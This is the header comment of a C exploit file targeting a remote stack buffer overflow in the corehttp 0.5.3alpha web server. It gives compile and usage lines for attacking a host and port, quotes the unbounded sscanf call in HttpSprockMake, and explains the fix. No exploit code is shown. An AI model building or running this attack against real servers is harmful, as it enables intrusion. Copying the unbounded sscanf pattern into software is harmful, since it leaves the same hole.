1 /*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
2 * *
3 * by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
4 * *
5 * compile: *
6 * gcc xcorehttp.c −o xcorehttp *
7 * *
8 * syntax: *
9 * ./xcorehttp [−r] −h host −p port *
10 * *
11 * corehttp homepage/url: *
12 * http://corehttp.sourceforge.net/ *
13 * *
14 * bug(http.c): *
15 * −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− *
16 * struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { *
17 * struct sprock_t *sprocket; *
18 * char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
19 * ... *
20 * if ((sprocket = (struct sprock_t *) *
21 * malloc(sizeof(struct sprock_t))) == NULL) return NULL; *
22 * ... *
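23 * sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url); *
24 * !(the bug/overwrite) --------------------------------------^----^ *
   * (neither %[A-Za-z] nor %s carries a maximum field width, so sscanf() *
   * keeps writing past req[PATHSIZE] / url[PATHSIZE] on the stack when the *
   * request line is longer than the buffers; the fix is a field width *
   * smaller than PATHSIZE on both conversions, or a length check on *
   * parentsprock->buffer before it is parsed) *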
25 * strncpy(sprocket->parent->url, url, PATHSIZE); *
26 * !(the problem) -^